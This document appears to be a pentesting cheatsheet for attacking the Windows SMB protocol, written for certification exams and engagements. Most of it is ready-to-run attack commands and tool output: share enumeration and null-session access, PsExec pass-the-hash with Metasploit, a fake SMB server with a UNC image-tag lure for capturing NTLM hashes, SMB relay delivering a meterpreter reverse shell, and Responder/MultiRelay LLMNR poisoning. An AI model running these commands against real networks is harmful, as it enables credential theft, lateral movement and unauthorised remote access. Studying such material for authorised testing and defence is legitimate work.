This article is mostly a cheatsheet for attacking the SMB protocol. It should be useful for taking the OSCP/eCPPT exam or during engagements.
There are so many tools that are useful for attacking SMB that it's worth organizing them.
What is SMB
The purpose of SMB is to facilitate the sharing of resources over the network: files/folders/disks/printers.
Here are some handy enumeration commands:
smbclient -L <IP Address>- List all the shares
smbclient \\\\<IP Address>\\<Share Name>- Connect to a share
enum4linux <IP Address>- Script gathering a wealth of information from the SMB protocol:
- Information about the host: workgroup/domain/OS
mount -t cifs \\\\<IP Address>\\<Share Name> /mnt/<Share Name>- Mounting a share to the local file system
- Nmap NSE Scripts:
nmap -sT –sU -sV <IP Address> -p135,137,138,139,445 --open- Check if SMB is running
nmap --script smb-enum-shares <IP Address>- Enumerate shares
nmap --script smb-check-vulns <IP Address>- Check for common SMB Vulnerabilities
nmap --script smb-os-discovery <IP Address> -p 445- Information about the OS gathered from SMB
- Metasploit Modules:
use auxiliary/scanner/smb/smb_login- Brute force authentication
use auxiliary/scanner/smb/smb_enumshares- Enumerate shares
smbmap -H <IP Address>- Enumerate shares (offers a bunch of other functionalities like searching in files, uploading/downloading)
If a system is vulnerable to Null Sessions, then a user can connect without providing a username and password.
Here's how to list the shares of a system that allows null sessions:
smbclient -L //<IP Address>/ -U '' -N
Here's an example of using the smbclient command to connect to a share and listing its contents taking advantage of a Null Session vulnerability:
$smbclient \\\\<IP Address>\\Backups Enter WORKGROUP\htb-xxx password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Apr 16 10:02:11 2019 .. D 0 Tue Apr 16 10:02:11 2019 note.txt AR 116 Tue Apr 16 10:10:09 2019 SDT65CB.tmp A 0 Fri Feb 22 12:43:08 2019 WindowsImageBackup Dn 0 Fri Feb 22 12:44:02 2019 7735807 blocks of size 4096. 2764397 blocks available smb: \>
PsExec & Pass the Hash
PsExec was originally created as a Windows system administration tool. It is commonly used by pentesters as a method of executing commands on remote machines. PsExec can't be used under any conditions though. Here's what it needs in order to work:
- Have SMB Running (ports 139 or 445).
- Username with Password or NTLM hash of the password (PsExec implementations can take advantage of the Pass-The-Hash method).
ADMIN$share must be available. The user we authenticate as must have permissions to access the ADMIN$ share.
Here are some Metasploit modules related to PsExec:
exploit/windows/smb/psexec- Obtain a shell on a vulnerable host
exploit/windows/local/current_user_psexec- Local exploit for local administrator machine with goal to obtain session on domain controller
auxiliary/admin/smb/psexec_command- Run single commands on a host without uploading payloads that can be detected
auxiliary/scanner/smb/psexec_loggedin_users- Get the current logged in users via PsExec
Pass the Hash is a technique for connecting to a Windows machine using the username and the password hash (LM / NTLM) rather than the actual password.
Let's suppose we obtained access to a machine. We dumped the hashes. We can use those to get access to more machines using these hashes because usually the users have the same passwords for all the machines inside a network.
msf exploit(psexec) > set SMBPASS hashhashhashhashhashhashhashhash:hashhashhashhashhashhashhashhash SMBPASS => hashhashhashhashhashhashhashhash:hashhashhashhashhashhashhashhash msfexploit(psexec) > set SMBUSER john SMBUSER => john msfexploit(psexec) > set RHOST 192.168.10.10 RHOST => 192.168.10.10 msfexploit(psexec) > exploit
Snatching & Cracking NTLM Hashes
NTLM = NT LAN Manager = Authentication protocol between Windows clients/servers
The authentication process follows these steps:
- NEGOTIATION - client sends its username
- CHALLENGE - The server generates a challenge
- AUTHENTICATION - Clients encrypts the challenge with its password (its hash rather) and sends it to the server
Historically, the autentication step has been iterated over the years due to a lack of security. There have been several strategies of hashing and sending the password to the server:
Note: Windows OSs can still store LM hashes
We can attack this authentication mechanism by impersonating the server. We can either:
- Trick a client to connect to our fake server
- Become MitM and sniff the client response (see SMB Relay Attack)
Let's become a fake server and wait for people to connect to us. For this we can use
msf6 auxiliary(server/capture/smb) > show options Module options (auxiliary/server/capture/smb): Name Current Setting Required Description ---- --------------- -------- ----------- CAINPWFILE no The local filename to store the hashes in Cain&Abel format CHALLENGE 1122334455667788 yes The 8 byte server challenge JOHNPWFILE no The prefix to the local filename to store the hashes in John format SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 445 yes The local port to listen on. Auxiliary action: Name Description ---- ----------- Capture Run SMB capture server
Since we can choose any challenge, it's customary to use the
Using a fixed value makes hach cracking process easier.
Also notice the
JOHNPWFILE parameter; a file to store the hashes to and crack them using
In order to have the victim connect to us,
we can send and email or direct them to a webpage containing an UNC to our server:
<img src="\\<Server IP Address>\ADMIN$">.
We can try cracking the hashes using
john using this command:
john --format=netlm hashfile.txt.
There are other ways to crack these hashes, for examples using rainbow tables.
SMB Relay Attack
SMB Relay attack is somewhat similar to the previous NTLM hash snatch technique. For this attack, we will become the MitM. Let's see how the authentication process works in this scenario:
- NEGOTIATION - CLIENT issues a request to the ATTACKER. The ATTACKER issues a request to the SERVER
- CHALLENGE - The SERVER generates a challenge and passes it to the ATTACKER who then passes it back to the CLIENT
- AUTHENTICATION - The CLIENT encrypts the challenge and sends it back to the ATTACKER, who sends it to the SERVER, authenticating him as CLIENT
For mounting this attack we can use the Metasploit
msf6 auxiliary(server/capture/smb) > use exploit/windows/smb/smb_relay [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/smb_relay) > show options Module options (exploit/windows/smb/smb_relay): Name Current Setting Required Description ---- --------------- -------- ----------- SHARE ADMIN$ yes The share to connect to SMBHOST no The target SMB server (leave empty for originating system) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 445 yes The local port to listen on. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.9.1 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
As soon as clients start trying to authenticate with the Attacker, we will get metasploit sessions created.
Note: The attack won't work with NTLMv2 hashes because they are specific to each machine and can't be reused.
Responder.py and LLMNR Poisoning
LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback protocols used for resolution of hostnames inside a network when the DNS protocol fails.
LLMNR/NBT-NS spoofing/poisoning is a method of capturing NTLMv1, NTLMv2 and LM hashes via a MitM type attack.
Falling back on LLMNR/NBT-NS implies broadcasting NTLMv1/NTLMv2 hashes over the network. We will intercept these hashes and either:
- Relay the hashes to other systems
- Crack the hashes
Reponder.py is a LLMNR/NBT-NS/mDNS poisoner. It can be helpful with both intercepting and relaying the hashes.
In order for the attack to work, SMB Signing must be disabled on the machines we are exploiting.
We can fingerprint a machine like this:
python RunFinger.py -i <IP Address>
For intercepting the hashes we need to run:
python Responder.py -I eth0 -rdwv --lm
For relaying the hashes we can run:
python MultiRelay.py -t <IP Address> –u ALL
A successful relay will result in an upgraded shell where we can run other tools (scanning, mimikatz, pivoting, etc ...) or other plain cmd commands.